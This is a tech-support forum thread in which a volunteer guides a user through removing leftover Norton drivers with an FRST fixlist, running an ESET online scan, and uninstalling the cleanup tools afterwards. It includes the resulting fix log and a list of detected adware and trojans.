Click Start... Control Panel
Then click on the Security button.
Under Windows Firewall... click on Turn Windows Firewall on or off.
Make sure the ON (recommended) is selected.... then click Apply and Ok.

Let's run a double check on things now.

I'd like us to scan your machine with ESET OnlineScan This process may may take several hours, that is normal.
  • Download esetsmartinstaller_enu.exe and save it to your Desktop
  • Double click the icon
  • Check YES, I accept the Terms of Use
  • Click the Start button
  • Accept any security warnings from your browser
  • Click Advanced settings
  • Check the following items
Enable detection of potentially unwanted applications
Remove found threats
Scan archives
Scan for potentially unsafe applications
Enable Anti-Stealth technology
  • Click Start
  • ESET will then download updates and begin scanning your computer
  • If no threats are found simply click Uninstall application on close and hit Finish
  • If threats are found click List of found threats
  • Click Export to text file
  • Save the file on your Desktop as ESET.txt
  • Click Back
  • Click Finish
  • Close the ESET Online Scanner window
  • Copy and paste the contents of ESET.txt in your next reply
 

Starbuck

Admin & Security Team
Joined
Feb 19, 2010
Messages
4,509
Location
Midlands, UK
PC Experience
Very Experienced
#9
Have just double checked the FRST report and have noticed that I've missed a few leftover entries for Norton AV. :grumpy:
These should be removed.

Please download the attached fixlist.txt file (bottom of this post) and save it to the Desktop.
NOTE.
It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system


Re-run FRST/FRST64 (which ever is installed ) and press the Fix button just once and wait.

HbL7sAI.png

The tool will make a log on the Desktop (Fixlog.txt). Please post this in your next reply.
 

Attachments

Rustys

Joined
Aug 28, 2017
Messages
134
Location
Here since I am not there
PC Experience
Very Experienced
#10
Here is the log for FRST

Currently running the Eset Online scan

Fix result of Farbar Recovery Scan Tool (x86) Version: 24.10.2018
Ran by Angela (01-11-2018 21:08:00) Run:2
Running from C:\Users\Angela\Desktop
Loaded Profiles: Angela (Available Profiles: Angela)
Boot Mode: Normal

==============================================

fixlist content:
*****************
CloseProcesses:
R0 SymDS; C:\Windows\System32\drivers\NAV\1302000.00A\SYMDS.SYS [340088 2011-07-25] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\NAV\1302000.00A\SYMEFA.SYS [897656 2011-09-26] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT.SYS [127096 2011-12-29] (Symantec Corporation)
S1 SymIRON; C:\Windows\system32\drivers\NAV\1302000.00A\Ironx86.SYS [149624 2011-07-25] (Symantec Corporation)
R1 SYMTDIv; C:\Windows\System32\Drivers\NAV\1302000.00A\SYMTDIV.SYS [344184 2011-07-25] (Symantec Corporation)
EmptyTemp:
*****************

Processes closed successfully.
SymDS => Unable to stop service.
HKLM\System\CurrentControlSet\Services\SymDS => removed successfully.
SymDS => service removed successfully.
SymEFA => Unable to stop service.
HKLM\System\CurrentControlSet\Services\SymEFA => removed successfully.
SymEFA => service removed successfully.
SymEvent => Unable to stop service.
HKLM\System\CurrentControlSet\Services\SymEvent => removed successfully.
SymEvent => service removed successfully.
HKLM\System\CurrentControlSet\Services\SymIRON => removed successfully.
SymIRON => service removed successfully.
SYMTDIv => Unable to stop service.
HKLM\System\CurrentControlSet\Services\SYMTDIv => removed successfully.
SYMTDIv => service removed successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 4270674 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 1796 B
Edge => 0 B
Chrome => 0 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 66228 B
LocalService => 0 B
NetworkService => 0 B
Angela => 32658 B

RecycleBin => 0 B
EmptyTemp: => 12.2 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 21:08:30 ====
 

Starbuck

Admin & Security Team
Joined
Feb 19, 2010
Messages
4,509
Location
Midlands, UK
PC Experience
Very Experienced
#11
Ok, that's good.
Sorry I missed those entries earlier.
Let's see if Eset finds anything.
 

Rustys

Joined
Aug 28, 2017
Messages
134
Location
Here since I am not there
PC Experience
Very Experienced
#12
Sorry I missed those entries earlier.
Do not worry about it,
Let's see if Eset finds anything.
Yes it did according to it found a few.

C:\Users\All Users\DataFile\Downloads\Windi.exe a variant of MSIL/FakeAlert.P trojan
C:\Users\All Users\Windows VXM\program\newver_572_1.8.5.0.exe multiple threats
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\SearchProtect\bin\cltmng.exe#E16E56491663406A a variant of Win32/Conduit.SearchProtect.Y potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\SearchProtect\bin\RN32.dll#D4C94DF112260BFA a variant of Win32/ClientConnect.A potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\SearchProtect\bin\SPtool64.exe#B365561379F9BB51 a variant of Win32/ClientConnect.A potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\SearchProtect\bin\VC32.dll#9E8236F8E2B7DEFA a variant of Win32/ClientConnect.A potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\SearchProtect\bin\VC32Loader.dll#02CB9F4AAFAD6069 a variant of Win32/ClientConnect.A potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\SearchProtect\bin\VC64.dll#69638C6E380DA9F4 a variant of Win32/ClientConnect.A potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\SearchProtect\bin\VC64Loader.dll#63D391BD3A5E9589 a variant of Win32/ClientConnect.A potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\UI\bin\cltmngui.exe#314EBA5B2CB6F56F a variant of Win32/Conduit.SearchProtect.Y potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\UI\dialogs\settings.html#1A39B34BBAE6D0AF Win32/Conduit.SearchProtect.AQ potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\UI\dialogs\Consent\consent.html#2D79354157F663CA Win32/Conduit.SearchProtect.AM potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\UI\dialogs\Consent\consent.js#5757C82C452F190B JS/Conduit.SearchProtect.A potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\UI\dialogs\libs\DialogAPI.js#C5E0379AB542E171 JS/Conduit.SearchProtect.I potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\UI\dialogs\libs\main.js#D80A8417BB4CCA58 JS/Conduit.SearchProtect.A potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\UI\dialogs\protection\protection.html#7EE8F346FFF3316B Win32/Conduit.SearchProtect.AZ potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\UI\dialogs\protection\protection.js#507A060638D671CE JS/Conduit.SearchProtect.A potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\UI\dialogs\protectionDS\protectionDS.html#EC62508BC21E7D47 Win32/Conduit.SearchProtect.AZ potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\UI\dialogs\protectionDS\protectionDS.js#68C64C2C3F4EFBDF JS/Conduit.SearchProtect.A potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\UI\dialogs\settings\settings.html#1A39B34BBAE6D0AF Win32/Conduit.SearchProtect.AR potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\UI\dialogs\settings\settings.js#446DAEB85E650D3D JS/Conduit.SearchProtect.A potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\UI\dialogs\uninstall\uninstall.html#FD7EF4923717CB8A Win32/Conduit.SearchProtect.AN potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\1\SearchProtect\UI\dialogs\uninstall\uninstall.js#67A6EA7E226CC2B8 JS/Conduit.SearchProtect.D potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\10\Seventh\userid.dll#38B3CD4460CD32E5 a variant of Win32/Adware.Snoozer.T application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\105\LolliScan\NSISHelper.dll#9AE7A58C7F87AA87 a variant of Win32/Adware.CouponMarvel.Q application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\13\QualityChecker\loader.exe#EAEA871AE1693D63 Win32/TrojanProxy.Agent.NZV trojan cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\13\QualityChecker\QC.exe#E9226A7F8645D4F6 Win32/TrojanProxy.Agent.NZV trojan cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\13\QualityChecker\qc.sys#E2D1CD4D697ECD7F Win32/TrojanProxy.Agent.NZV trojan cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\13\QualityChecker\uninstall.exe#5A462DAA1FEC4A84 Win32/Adware.ConvertAd.AKJ application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\141\SHOPPERZ\krios.dll#CDE5F7F0893CD4E7 a variant of Win32/Toolbar.Perion.V potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\142\GMSD_US_005010193\gamesdesktop_widget.exe#A8E2C064354C9ABB a variant of Win32/AdWare.EoRezo.AU application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\142\GMSD_US_005010193\gmsd_us_005010193.exe#EECCC429DA04DE2E a variant of Win32/AdWare.EoRezo.AU application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\142\GMSD_US_005010193\predm.exe#F0074EFFBCAC8F97 a variant of Win32/Adware.EoRezo.BG application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\143\GMSD_US_005010199\gamesdesktop_widget.exe#A8E2C064354C9ABB a variant of Win32/AdWare.EoRezo.AU application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\143\GMSD_US_005010199\gmsd_us_005010199.exe#C060911A56151F03 a variant of Win32/AdWare.EoRezo.AU application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\143\GMSD_US_005010199\predm.exe#F0074EFFBCAC8F97 a variant of Win32/Adware.EoRezo.BG application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\144\GMSD_US_005010200\gamesdesktop_widget.exe#A8E2C064354C9ABB a variant of Win32/AdWare.EoRezo.AU application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\144\GMSD_US_005010200\gmsd_us_005010200.exe#45874345B3084777 a variant of Win32/AdWare.EoRezo.AU application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\144\GMSD_US_005010200\predm.exe#F0074EFFBCAC8F97 a variant of Win32/Adware.EoRezo.BG application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\151\{05040C47-0805-0C05-0B11-0B0E05041109}#6B57E743D23A6AD3 XML/Adware.Adposhel.A application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\154\{05040C47-0805-0C05-0B11-0B0E05041109}.job#C5D640FC51327471 PowerShell/Adware.Adposhel.A application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\155\{080A7E47-0B08-0B0F-0411-0A047D0E1178}.job#824E8D4D5F04C48B PowerShell/Adware.Adposhel.A application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\16\SPPD.sys#3568F526C3A3DD83 a variant of Win32/ClientConnect.C potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\163\{A55667F1-A319-4629-A8B6-A68D9D3313EE}GT.SYS#446F43D9D9D40BA5 a variant of Win32/BrowseFox.AR potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\8\avayvaxvaa\avayvaxvaa.exe#27AED5D865681F8D a variant of Win32/Conduit.SearchProtect.Y potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20070320.011634\8\avayvaxvaa\pbqrmvbub#8837EC338DA3662C a variant of Win32/ClientConnect.A potentially unwanted application cleaned by deleting
C:\Program Files\Windows Audio\R1\AudioSrv.exe a variant of Win32/Adware.Dowsserve.A application cleaned by deleting
C:\Program Files\Windows Audio\R1\WmiPrvSD.exe a variant of Win32/Adware.Dowsserve.B application cleaned by deleting
C:\Program Files\Windows Network Accelerater\v3\vxmclient.exe a variant of Win32/Adware.Dowsserve.E application cleaned by deleting
C:\Program Files\Windows Network Accelerater\v3\winvxm.exe a variant of Win32/Adware.Dowsserve.C application cleaned by deleting
C:\Program Files\Windows Network Accelerater\v5\vxmclient.exe a variant of Win32/Adware.Dowsserve.E application cleaned by deleting
C:\Program Files\Windows Network Accelerater\v5\winvxm.exe a variant of Win32/Adware.Dowsserve.C application cleaned by deleting
C:\Program Files\Windows Network Services\v9\network.exe a variant of Win32/Adware.Dowsserve.F application cleaned by deleting
C:\Program Files\Windows Network Services\v9\wmnserv.exe a variant of Win32/Adware.Dowsserve.F application cleaned by deleting (after the next restart)
C:\ProgramData\DataFile\Downloads\Windi.exe a variant of MSIL/FakeAlert.P trojan cleaned by deleting
C:\ProgramData\Malwarebytes\MBAMService\09875aec-dcd9-11e8-ba93-0003254135cb Win32/TrojanProxy.Agent.NZV trojan cleaned by deleting (after the next restart)
C:\ProgramData\Windows VXM\program\newver_572_1.8.5.0.exe multiple threats cleaned by deleting
C:\Users\All Users\Malwarebytes\MBAMService\09875aec-dcd9-11e8-ba93-0003254135cb Win32/TrojanProxy.Agent.NZV trojan cleaned by deleting (after the next restart)
C:\Users\Angela\AppData\Local\gmsd_us_005010193\upgmsd_us_005010193.exe a variant of Win32/Adware.EoRezo.AJ application cleaned by deleting
C:\Users\Angela\AppData\Local\gmsd_us_005010193\Download\myoffergroup_us6.exe multiple threats cleaned by deleting
C:\Users\Angela\AppData\Local\gmsd_us_005010199\upgmsd_us_005010199.exe a variant of Win32/Adware.EoRezo.AJ application cleaned by deleting
C:\Users\Angela\AppData\Local\gmsd_us_005010199\Download\myoffergroup_us6.exe multiple threats cleaned by deleting
C:\Users\Angela\AppData\Local\gmsd_us_005010200\upgmsd_us_005010200.exe a variant of Win32/Adware.EoRezo.AJ application cleaned by deleting
C:\Users\Angela\AppData\Roaming\74697254-1425516543-2D2D-2D2D-0003254135CB\rnsqAFCB.exe a variant of Win32/Adware.ConvertAd.GM application cleaned by deleting
C:\Users\Angela\AppData\Roaming\74697254-1425516543-2D2D-2D2D-0003254135CB\Uninstall.exe Win32/Adware.ConvertAd.EB application cleaned by deleting
C:\Users\Angela\AppData\Roaming\FrostWire\.AppSpecialShare\frostwire-4.21.3.windows.exe a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application cleaned by deleting
 

Starbuck

Admin & Security Team
Joined
Feb 19, 2010
Messages
4,509
Location
Midlands, UK
PC Experience
Very Experienced
#13
Seems that Eset did get those last 2 entries:
C:\ProgramData\DataFile\Downloads\Windi.exe a variant of MSIL/FakeAlert.P trojan cleaned by deleting
C:\ProgramData\Windows VXM\program\newver_572_1.8.5.0.exe multiple threats cleaned by deleting
So everything malicious that can be seen, has now been removed.
Give the system awhile to run and if nothing untoward is thrown up I'll finish off tomorrow evening.
 

Starbuck

Admin & Security Team
Joined
Feb 19, 2010
Messages
4,509
Location
Midlands, UK
PC Experience
Very Experienced
#15
Thank you for all that you have done.
No problem at all.

Take some extra vacation days out of the vacation fund.
Funny you should say that .... I leave in a few hours lol.

Let's finish the cleaning process and remove the tools we have used.

Step 1
FRST can now be removed:

Right click on the FRST icon and select delete.
Right click on any fixlog.txt or fixlist.txt files and select delete.
Navigate to: C:\frst and delete the frst folder

Step 2
RogueKiller AntiMalware can be removed using the add/Remove Programs feature in Control Panel.

Step 3
To remove AdwCleaner

Restart AdwCleaner ... click on the Uninstall button from the main screen.
This will remove all the files created and the program.

Step 4

Eset can be removed using the add/Remove Programs feature in Control Panel.

Glad I was able to help.

Safe surfing. Computer_addict__by_Sinister_Starfeesh.gif